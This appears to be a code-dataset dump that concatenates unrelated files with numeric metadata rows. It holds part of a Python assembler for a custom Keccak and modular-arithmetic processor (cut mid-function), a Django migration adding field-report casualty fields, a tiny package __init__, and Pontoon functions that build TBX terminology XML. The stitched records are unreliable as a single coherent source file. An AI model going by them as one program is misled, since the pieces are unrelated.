elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_o[j] = "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
if(all_operands[i] in internal_labels):
machine_code_operand_b[j] = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_b[j] = "0" + "1" + "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_b[j] = "0" + "1" + "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_b[j] = "0" + "1" + "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
if(all_operands[i][0] == '+'):
machine_code_operand_a_sign = "1"
elif(all_operands[i][0] == '-'):
machine_code_operand_a_sign = "0"
else:
error_during_assembly = True
i += 1
if(all_operands[i] in internal_labels):
machine_code_operand_a[j] = machine_code_operand_a_sign + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_a[j] = machine_code_operand_a_sign + "1" + "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_a[j] = machine_code_operand_a_sign + "1" + "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_a[j] = machine_code_operand_a_sign + "1" + "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
j += 1
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
final_machine_code = ''
for i in range(3):
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[i] + machine_code_operand_b[i] + machine_code_operand_a[i]
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
final_machine_code = final_machine_code + machine_code + '\n'
number_of_instructions += 1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[3] + machine_code_operand_b[3] + machine_code_operand_a[3]
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
final_machine_code = final_machine_code + machine_code
number_of_instructions += 1
return final_machine_code, number_of_instructions
def instruction_mitred(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 0
machine_code_processor = '01'
machine_code_intruction_type = '0000101'
machine_code_operand_o = ['00000000000000000' for i in range(4)]
machine_code_operand_b = ['0000000000000000000' for i in range(4)]
machine_code_operand_a = ['0000000000000000000' for i in range(4)]
last_operand = len(command)
all_operands = command[1:last_operand]
i = 0
j = 0
while((i < len(all_operands))):
if(all_operands[i] in internal_labels):
machine_code_operand_o[j] = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_o[j] = "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_o[j] = "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_o[j] = "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
if(all_operands[i] in internal_labels):
machine_code_operand_a[j] = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_a[j] = "0" + "1" + "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_a[j] = "0" + "1" + "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_a[j] = "0" + "1" + "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
j += 1
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
final_machine_code = ''
for i in range(3):
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[i] + machine_code_operand_b[i] + machine_code_operand_a[i]
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
final_machine_code = final_machine_code + machine_code + '\n'
number_of_instructions += 1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[3] + machine_code_operand_b[3] + machine_code_operand_a[3]
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
final_machine_code = final_machine_code + machine_code
number_of_instructions += 1
return final_machine_code, number_of_instructions
def instruction_madd_subr(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 0
machine_code_processor = '01'
machine_code_intruction_type = '0000110'
machine_code_operand_o = ['00000000000000000' for i in range(4)]
machine_code_operand_b = ['0000000000000000000' for i in range(4)]
machine_code_operand_a = ['0000000000000000000' for i in range(4)]
all_operands = command[1:]
i = 0
j = 0
while((i < len(all_operands))):
if(all_operands[i] in internal_labels):
machine_code_operand_o[j] = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_o[j] = "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_o[j] = "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_o[j] = "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
if(all_operands[i] in internal_labels):
machine_code_operand_b[j] = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_b[j] = "0" + "1" + "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_b[j] = "0" + "1" + "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_b[j] = "0" + "1" + "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
if(all_operands[i][0] == '+'):
machine_code_operand_a_sign = "1"
elif(all_operands[i][0] == '-'):
machine_code_operand_a_sign = "0"
else:
error_during_assembly = True
i += 1
if(all_operands[i] in internal_labels):
machine_code_operand_a[j] = machine_code_operand_a_sign + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_a[j] = machine_code_operand_a_sign + "1" + "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_a[j] = machine_code_operand_a_sign + "1" + "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_a[j] = machine_code_operand_a_sign + "1" + "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
j += 1
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
final_machine_code = ''
for i in range(3):
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[i] + machine_code_operand_b[i] + machine_code_operand_a[i]
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
final_machine_code = final_machine_code + machine_code + '\n'
number_of_instructions += 1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[3] + machine_code_operand_b[3] + machine_code_operand_a[3]
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
final_machine_code = final_machine_code + machine_code
number_of_instructions += 1
return final_machine_code, number_of_instructions
instruction_opcodes = {'nop':instruction_nop,'jump':instruction_jumpeq,'jumpeq':instruction_jumpeq,'jumpl':instruction_jumpl,'jumpls':instruction_jumpl, 'jumpeql':instruction_jumpeql, 'jumpeqls':instruction_jumpeql,'push':instruction_push,'pop':instruction_pop,'pushf':instruction_pushf,'popf':instruction_popf,'pushm':instruction_pushm,'popm':instruction_popm,'copy':instruction_copy,'copyf':instruction_copyf,'copym':instruction_copym,'copya':instruction_copya,'lconstf':instruction_lconstf,'lconstm':instruction_lconstm,'call':instruction_call,'ret':instruction_ret,'keccak_init':instruction_keccak_init,'keccak_go':instruction_keccak_go,'badd':instruction_badd,'bsub':instruction_bsub,'bsmul':instruction_bsmul,'bsmuls':instruction_bsmul,'bshiftr':instruction_bshift,'bshiftl':instruction_bshift,'brotr':instruction_brot,'brotl':instruction_brot,'bland':instruction_bland,'blor':instruction_blor,'blxor':instruction_blxor,'blnot':instruction_blxor,'fin':instruction_fin,'mmuld':intruction_mmuld,'msqud':intruction_msqud,'mmulm':intruction_mmulm,'msqum':intruction_msqum,'madd_subd':instruction_madd_subd,'mitred':instruction_mitred,'madd_subr':instruction_madd_subr}
def remove_coments(line):
# Remove anything that is after the character ';' (.split(';')[0])
# Remove any white space that has been added in both the beginning and end of the string (.strip())
return line.split(';')[0].strip()
def change_all_to_lowercase(line):
return line.lower()
def check_label_and_add_to_dicionary(line, internal_labels, program_counter, enable_show_program_labels):
if(':' in line):
# Only the first ':' is assigned, the remaining are kept, even though the current syntax does not permit.
new_line = line.split(':', 1)
label = new_line[0].strip()
internal_labels[label] = program_counter
if(enable_show_program_labels):
print("Label : " + label + " at = " + str(program_counter))
new_line = new_line[1].strip() + "\n"
else:
new_line = line
return new_line
#
# First pass of assembly operation:
# - Remove all comments
# - Change all letters case to lower.
#
def assembly_file_remove_comments_change_to_lower_case(input_file, output_file):
for line in input_file:
line_without_comments = remove_coments(line)
# Only execute if the line still has any command.
if(line_without_comments):
line_lower_no_comments = change_all_to_lowercase(line_without_comments)
output_file.write(line_lower_no_comments + '\n')
#
# Second pass of assembly operation:
# - Solve constant labels
#
def assembly_file_add_constant_labels(input_file, output_file, internal_labels):
for line in input_file:
if(':' in line):
line_without_spaces = line.strip()
line_with_label = line_without_spaces.split(':', 1)
if(line_with_label[1].isdigit()):
label = line_with_label[0].strip()
internal_labels[label] = int(line_with_label[1])
else:
output_file.write(line)
else:
output_file.write(line)
#
# Third pass of assembly operation:
# - Solve instructions with no label and write them in assembly
# - Find label positions and add them to a dictionary
#
def assembly_file_solve_instructions_add_position_labels(input_file, output_file, internal_labels, enable_show_program_labels):
program_counter = 0
for line in input_file:
line_without_labels = check_label_and_add_to_dicionary(line, internal_labels, program_counter, enable_show_program_labels)
command = line_without_labels.split()
if((len(command) == 0) or (not (command[0] in instruction_opcodes))):
print("Not supported opcode")
print(line)
return -1
mounted_command, number_of_instructions = instruction_opcodes[command[0]](command, internal_labels, False)
program_counter += number_of_instructions
if(mounted_command != ""):
size_command_correct = True
for separate_mounted_command in mounted_command.splitlines():
if(((len(separate_mounted_command) % 64) != 0)):
print("Wrong instruction size (" + str(len(mounted_command)) + ")")
print('1')
print(command)
size_command_correct = False
if(size_command_correct):
output_file.write(mounted_command + '\n')
else:
output_file.write(line_without_labels)
#
# Fourth pass of assembly operation:
# - Solve remaining instructions.
#
def assembly_file_solve_remaining_instructions(input_file, output_file, internal_labels):
program_counter = 0
for line in input_file:
command = line.split()
if(command[0] in instruction_opcodes):
mounted_command, number_of_instructions = instruction_opcodes[command[0]](command, internal_labels)
program_counter += number_of_instructions
mounted_command = mounted_command + '\n'
else:
mounted_command = line
program_counter += 1
if(len(mounted_command) != 65):
print("Wrong instruction size (" + str(len(mounted_command)) + ")")
print("2")
print(command)
return -1
else:
output_file.write(mounted_command)
print("Program size in terms of instructions = " + str(program_counter))
def assembly_file_four_pass(input_file_name, output_file_name, enable_intermediate_files=False, enable_show_program_labels=False):
program_counter = 0
internal_labels = dict()
fill_internal_labels(internal_labels)
with open(output_file_name, 'w') as output_file, open(input_file_name, 'r') as input_file:
if(enable_intermediate_files):
output_file_first_pass = open(output_file_name + '_temp_first_pass.dat', 'w+')
output_file_second_pass = open(output_file_name + '_temp_second_pass.dat', 'w+')
output_file_third_pass = open(output_file_name + '_temp_third_pass.dat', 'w+')
else:
output_file_first_pass = tempfile.TemporaryFile(mode='r+')
output_file_second_pass = tempfile.TemporaryFile(mode='r+')
output_file_third_pass = tempfile.TemporaryFile(mode='r+')
assembly_file_remove_comments_change_to_lower_case(input_file, output_file_first_pass)
output_file_first_pass.seek(0)
assembly_file_add_constant_labels(output_file_first_pass, output_file_second_pass, internal_labels)
output_file_second_pass.seek(0)
assembly_file_solve_instructions_add_position_labels(output_file_second_pass, output_file_third_pass, internal_labels, enable_show_program_labels)
output_file_third_pass.seek(0)
assembly_file_solve_remaining_instructions(output_file_third_pass, output_file, internal_labels)
if(enable_intermediate_files):
output_file_first_pass.close()
output_file_second_pass.close()
output_file_third_pass.close()
def fill_internal_labels(internal_labels):
base_words_per_mac_words = 8
mac_words_per_operand = 8
# Add MAC ram labels for internal mac instructions
for i in range(256):
internal_labels['m' + str(i)] = i
# Add MAC ram labels for full bus copy instructions
for i in range(256):
for j in range(mac_words_per_operand):
internal_labels['m' + str(i) + '.' + str(j)] = i*mac_words_per_operand + j
# Add MAC ram labels for local bus copy instructions
for i in range(256):
for j in range(mac_words_per_operand):
for z in range(base_words_per_mac_words):
internal_labels['m' + str(i) + '.' + str(j) + '.' + str(z)] = i*mac_words_per_operand*base_words_per_mac_words + j*base_words_per_mac_words + z
# Add Program rom labels for local bus copy instructions
# It does not work, but it won't be needed.
# In order to work, the program memory would need to operate the local bus independently of the full bus.
# Therefore increasing the amount of necessary memory, for an extra interface.
#for i in range(256):
# for j in range(16):
# internal_labels['p' + str(i) + '.' + str(j)] = int("0x04000", base=16) + i*16 + j
# Add Base ram labels
for i in range(1024):
internal_labels['b' + str(i)] = int("0x0C000", base=16) + i
# Single labels
for i in range(64):
internal_labels['rd' + str(i)] = int("0x0C000", base=16) + i
internal_labels['scalar'] = int("0x0C000", base=16)
internal_labels['keccak_absorb_byte_lsb'] = int("0x0D000", base=16)
internal_labels['keccak_absorb_byte_msb'] = int("0x0D080", base=16)
internal_labels['keccak_absorb'] = int("0x0D100", base=16)
internal_labels['keccak_absorb_swp'] = int("0x0D180", base=16)
internal_labels['keccak_squeeze_byte'] = int("0x0D200", base=16)
internal_labels['keccak_squeeze'] = int("0x0D300", base=16)
internal_labels['keccak_dout'] = int("0x0D400", base=16)
internal_labels['pc'] = int("0x0E000", base=16)
internal_labels['rstatus'] = int("0x0E001", base=16)
internal_labels['roperands'] = int("0x0E002", base=16)
internal_labels['rprimeline'] = int("0x0E003", base=16)
internal_labels['rprimeaddr'] = int("0x0E004", base=16)
internal_labels['rprimeplusoneaddr'] = int("0x0E005", base=16)
internal_labels['rprimelineaddr'] = int("0x0E006", base=16)
internal_labels['r2primeaddr'] = int("0x0E007", base=16)
internal_labels['stackinitaddr'] = int("0x0E008", base=16)
internal_labels['flag'] = int("0x0E009", base=16)
internal_labels['scalarinitaddr'] = int("0x0E00A", base=16)
# User defined labels
# They are used so it is easier to write assembly programs on the device
# Add version for full/local bus copy.
# Add MAC ram labels for local bus copy instructions
# fp2t0 -> fp2t7
base_address = 216
for i in range(8):
internal_labels['fp2t' + str(i)] = base_address + i
for j in range(mac_words_per_operand):
internal_labels['fp2t' + str(i) + '.' + str(j)] = (base_address + i)*mac_words_per_operand + j
for z in range(base_words_per_mac_words):
internal_labels['fp2t' + str(i) + '.' + str(j) + '.' + str(z)] = (base_address + i)*mac_words_per_operand*base_words_per_mac_words + j*base_words_per_mac_words + z
# tmpf0 -> tmpf39
base_address = 20
for i in range(40):
internal_labels['tmpf' + str(i)] = base_address + i
for j in range(mac_words_per_operand):
internal_labels['tmpf' + str(i) + '.' + str(j)] = (base_address + i)*mac_words_per_operand + j
for z in range(base_words_per_mac_words):
internal_labels['tmpf' + str(i) + '.' + str(j) + '.' + str(z)] = (base_address + i)*mac_words_per_operand*base_words_per_mac_words + j*base_words_per_mac_words + z
# var0 -> var155
base_address = 60
for i in range(156):
internal_labels['var' + str(i)] = base_address + i
for j in range(mac_words_per_operand):
internal_labels['var' + str(i) + '.' + str(j)] = (base_address + i)*mac_words_per_operand + j
for z in range(base_words_per_mac_words):
internal_labels['var' + str(i) + '.' + str(j) + '.' + str(z)] = (base_address + i)*mac_words_per_operand*base_words_per_mac_words + j*base_words_per_mac_words + z
def print_main_class_help():
print('The parameters options are:')
print('')
print('assembler.py assembly_program.txt mounted_program.dat [-l] [-d]')
print('')
print("assembly_program.txt")
print("The input program")
print('')
print("mounted_program.dat")
print("The name of the output, if not specified it will just use the original program name with the .dat extension.")
print('')
print("-l")
print("Enable showing the position of all program labels. This is useful to know certain program positions.")
print('')
print("-d")
print("Enable intermediate output files used by the assembling process. Applied in case of debugging the assembler.")
if __name__ == "__main__":
argc = len(sys.argv)
if(argc >= 2):
input_file_name = sys.argv[1]
enable_intermediate_files = False
enable_show_program_labels = False
if('-d' in sys.argv):
enable_intermediate_files = True
argc -= 1
if('-l' in sys.argv):
enable_show_program_labels = True
argc -= 1
if(argc == 1):
print("Unknown amount of options")
print('')
print_main_class_help()
if(argc == 3):
output_file_name = sys.argv[2]
elif(argc == 2):
output_file_name = input_file_name.rsplit('.', 1)[0] + '.dat'
assembly_file_four_pass(input_file_name, output_file_name, enable_intermediate_files, enable_show_program_labels)
else:
print("Unknown amount of options")
print('')
print_main_class_help()
| 50.439896
| 1,171
| 0.578181
| 18,169
| 135,532
| 4.037481
| 0.034454
| 0.144703
| 0.143299
| 0.059831
| 0.897297
| 0.879398
| 0.871955
| 0.855651
| 0.84709
| 0.842115
| 0
| 0.088326
| 0.25695
| 135,532
| 2,687
| 1,172
| 50.439896
| 0.640095
| 0.168676
| 0
| 0.860664
| 0
| 0.000503
| 0.067421
| 0.000595
| 0.126761
| 0
| 0.001345
| 0
| 0
| 1
| 0.023139
| false
| 0.04326
| 0.001509
| 0.001006
| 0.077465
| 0.048793
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e88eefb6819d05e0671da287159c41dd47af66d9
| 1,476
|
py
|
Python
|
api/migrations/0023_auto_20190724_0841.py
|
IFRCGo/ifrcgo-api
|
c1c3e0cf1076ab48d03db6aaf7a00f8485ca9e1a
|
[
"MIT"
] | 11
|
2018-06-11T06:05:12.000Z
|
2022-03-25T09:31:44.000Z
|
api/migrations/0023_auto_20190724_0841.py
|
IFRCGo/ifrcgo-api
|
c1c3e0cf1076ab48d03db6aaf7a00f8485ca9e1a
|
[
"MIT"
] | 498
|
2017-11-07T21:20:13.000Z
|
2022-03-31T14:37:18.000Z
|
api/migrations/0023_auto_20190724_0841.py
|
IFRCGo/ifrcgo-api
|
c1c3e0cf1076ab48d03db6aaf7a00f8485ca9e1a
|
[
"MIT"
] | 6
|
2018-04-11T13:29:50.000Z
|
2020-07-16T16:52:11.000Z
|
# Generated by Django 2.0.12 on 2019-07-24 08:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0022_appeal_real_data_update'),
]
operations = [
migrations.AddField(
model_name='fieldreport',
name='other_num_affected',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='fieldreport',
name='other_num_assisted',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='fieldreport',
name='other_num_dead',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='fieldreport',
name='other_num_displaced',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='fieldreport',
name='other_num_injured',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='fieldreport',
name='other_num_missing',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='fieldreport',
name='start_date',
field=models.DateTimeField(blank=True, null=True),
),
]
| 30.122449
| 62
| 0.575881
| 141
| 1,476
| 5.858156
| 0.333333
| 0.152542
| 0.194915
| 0.228814
| 0.7046
| 0.7046
| 0.7046
| 0.7046
| 0.644068
| 0.644068
| 0
| 0.019685
| 0.311653
| 1,476
| 48
| 63
| 30.75
| 0.793307
| 0.031165
| 0
| 0.642857
| 1
| 0
| 0.154762
| 0.019608
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02381
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e892b2d40c1ded2208b2c955a7039367421233a1
| 84
|
py
|
Python
|
easy_exceptions/__init__.py
|
riegie/EasyExceptions
|
72c8991b097be11ed58d3219376670e3d333a91e
|
[
"MIT"
] | 4
|
2020-03-06T18:38:38.000Z
|
2020-03-07T02:49:46.000Z
|
easy_exceptions/__init__.py
|
riegie/EasyExceptions
|
72c8991b097be11ed58d3219376670e3d333a91e
|
[
"MIT"
] | null | null | null |
easy_exceptions/__init__.py
|
riegie/EasyExceptions
|
72c8991b097be11ed58d3219376670e3d333a91e
|
[
"MIT"
] | 1
|
2020-03-10T17:33:21.000Z
|
2020-03-10T17:33:21.000Z
|
from .easy_exceptions import EasyException
from .easy_exceptions import bind_parent
| 28
| 42
| 0.880952
| 11
| 84
| 6.454545
| 0.636364
| 0.225352
| 0.507042
| 0.676056
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 84
| 2
| 43
| 42
| 0.934211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e89848a02d19b512a6aab1aa3dc56c35679cf729
| 5,292
|
py
|
Python
|
pontoon/terminology/utils.py
|
foss4/pontoon
|
0503cc78f00e1e9d23c1ca885fe74a627563fc82
|
[
"BSD-3-Clause"
] | 1,145
|
2015-05-15T01:08:16.000Z
|
2022-03-31T14:23:45.000Z
|
pontoon/terminology/utils.py
|
foss4/pontoon
|
0503cc78f00e1e9d23c1ca885fe74a627563fc82
|
[
"BSD-3-Clause"
] | 1,365
|
2015-05-04T21:54:18.000Z
|
2022-03-30T16:53:49.000Z
|
pontoon/terminology/utils.py
|
foss4/pontoon
|
0503cc78f00e1e9d23c1ca885fe74a627563fc82
|
[
"BSD-3-Clause"
] | 667
|
2015-05-04T21:33:45.000Z
|
2022-03-30T10:25:33.000Z
|
from xml.sax.saxutils import escape, quoteattr
def build_tbx_v2_file(term_translations, locale):
"""
Generates contents of the TBX 2008 (v2) file (TBX-Default dialect):
TBX files could contain large amount of entries and it's impossible to render all the data with
django templates. Rendering a string in memory is a lot faster.
"""
yield (
'<?xml version="1.0" encoding="UTF-8"?>'
'\n<!DOCTYPE martif SYSTEM "TBXcoreStructV02.dtd">'
'\n<martif type="TBX" xml:lang="en-US">'
"\n\t<martifHeader>"
"\n\t\t<fileDesc>"
"\n\t\t\t<titleStmt>"
"\n\t\t\t\t<title>Mozilla Terms</title>"
"\n\t\t\t</titleStmt>"
"\n\t\t\t<sourceDesc>"
"\n\t\t\t\t<p>from a Mozilla termbase</p>"
"\n\t\t\t</sourceDesc>"
"\n\t\t</fileDesc>"
"\n\t\t<encodingDesc>"
'\n\t\t\t<p type="XCSURI">TBXXCSV02.xcs</p>'
"\n\t\t</encodingDesc>"
"\n\t</martifHeader>"
"\n\t<text>"
"\n\t\t<body>"
)
for translation in term_translations:
term = translation.term
yield (
'\n\t\t\t<termEntry id="c%(id)s">'
'\n\t\t\t\t<descrip type="context">%(usage)s</descrip>'
'\n\t\t\t\t<langSet xml:lang="en-US">'
"\n\t\t\t\t\t<ntig>"
"\n\t\t\t\t\t\t<termGrp>"
"\n\t\t\t\t\t\t\t<term>%(term)s</term>"
'\n\t\t\t\t\t\t\t<termNote type="partOfSpeech">%(part_of_speech)s</termNote>'
"\n\t\t\t\t\t\t</termGrp>"
"\n\t\t\t\t\t</ntig>"
"\n\t\t\t\t\t<descripGrp>"
'\n\t\t\t\t\t\t<descrip type="definition">%(definition)s</descrip>'
"\n\t\t\t\t\t</descripGrp>"
"\n\t\t\t\t</langSet>"
"\n\t\t\t\t<langSet xml:lang=%(locale)s>"
"\n\t\t\t\t\t<ntig>"
"\n\t\t\t\t\t\t<termGrp>"
"\n\t\t\t\t\t\t\t<term>%(translation)s</term>"
"\n\t\t\t\t\t\t</termGrp>"
"\n\t\t\t\t\t</ntig>"
"\n\t\t\t\t</langSet>"
"\n\t\t\t</termEntry>"
% {
"id": term.pk,
"term": escape(term.text),
"part_of_speech": escape(term.part_of_speech),
"definition": escape(term.definition),
"usage": escape(term.usage),
"locale": quoteattr(locale),
"translation": escape(translation.text),
}
)
yield ("\n\t\t</body>" "\n\t</text>" "\n</martif>\n")
def build_tbx_v3_file(term_translations, locale):
"""
Generates contents of the TBX v3 file (TBX-Basic dialect, DCT style):
TBX files could contain large amount of entries and it's impossible to render all the data with
django templates. Rendering a string in memory is a lot faster.
"""
yield (
'<?xml version="1.0" encoding="UTF-8"?>'
'\n<?xml-model href="https://raw.githubusercontent.com/LTAC-Global/TBX-Basic_dialect/master/DCA/TBXcoreStructV03_TBX-Basic_integrated.rng" type="application/xml" schematypens="http://relaxng.org/ns/structure/1.0"?>'
'\n<?xml-model href="https://raw.githubusercontent.com/LTAC-Global/TBX-Basic_dialect/master/DCA/TBX-Basic_DCA.sch" type="application/xml" schematypens="http://purl.oclc.org/dsdl/schematron"?>'
'\n<tbx style="dca" type="TBX-Basic" xml:lang="en" xmlns="urn:iso:std:iso:30042:ed-2">'
"\n\t<tbxHeader>"
"\n\t\t<fileDesc>"
"\n\t\t\t<titleStmt>"
"\n\t\t\t\t<title>Mozilla Terms</title>"
"\n\t\t\t</titleStmt>"
"\n\t\t\t<sourceDesc>"
"\n\t\t\t\t<p>from a Mozilla termbase</p>"
"\n\t\t\t</sourceDesc>"
"\n\t\t</fileDesc>"
"\n\t\t<encodingDesc>"
'\n\t\t\t<p type="XCSURI">TBXXCSV02.xcs</p>'
"\n\t\t</encodingDesc>"
"\n\t</tbxHeader>"
"\n\t<text>"
"\n\t\t<body>"
)
for translation in term_translations:
term = translation.term
yield (
'\n\t\t\t<conceptEntry id="c%(id)s">'
'\n\t\t\t\t<langSec xml:lang="en-US">'
"\n\t\t\t\t\t<termSec>"
"\n\t\t\t\t\t\t<term>%(term)s</term>"
'\n\t\t\t\t\t\t<termNote type="partOfSpeech">%(part_of_speech)s</termNote>'
"\n\t\t\t\t\t\t<descripGrp>"
'\n\t\t\t\t\t\t\t<descrip type="definition">%(definition)s</descrip>'
'\n\t\t\t\t\t\t\t<descrip type="context">%(usage)s</descrip>'
"\n\t\t\t\t\t\t</descripGrp>"
"\n\t\t\t\t\t</termSec>"
"\n\t\t\t\t</langSec>"
"\n\t\t\t\t<langSec xml:lang=%(locale)s>"
"\n\t\t\t\t\t<termSec>"
"\n\t\t\t\t\t\t<term>%(translation)s</term>"
"\n\t\t\t\t\t</termSec>"
"\n\t\t\t\t</langSec>"
"\n\t\t\t</conceptEntry>"
% {
"id": term.pk,
"term": escape(term.text),
"part_of_speech": escape(term.part_of_speech),
"definition": escape(term.definition),
"usage": escape(term.usage),
"locale": quoteattr(locale),
"translation": escape(translation.text),
}
)
yield ("\n\t\t</body>" "\n\t</text>" "\n</tbx>\n")
| 40.396947
| 223
| 0.51833
| 809
| 5,292
| 3.357231
| 0.170581
| 0.146539
| 0.149116
| 0.122239
| 0.874448
| 0.833211
| 0.81296
| 0.81296
| 0.801915
| 0.757732
| 0
| 0.007768
| 0.270219
| 5,292
| 130
| 224
| 40.707692
| 0.695495
| 0.086735
| 0
| 0.618182
| 1
| 0.118182
| 0.570832
| 0.239866
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018182
| false
| 0
| 0.009091
| 0
| 0.027273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e89bf4489261eaddb826ecce906fb72d18ebf969
| 8,980
|
py
|
Python
|
analysis_notebooks/stratify_helper.py
|
gitter-lab/active-learning-drug-discovery
|
b24004a359037b3a1175a61c181ec231b711c797
|
[
"MIT"
] | null | null | null |
analysis_notebooks/stratify_helper.py
|
gitter-lab/active-learning-drug-discovery
|
b24004a359037b3a1175a61c181ec231b711c797
|
[
"MIT"
] | null | null | null |
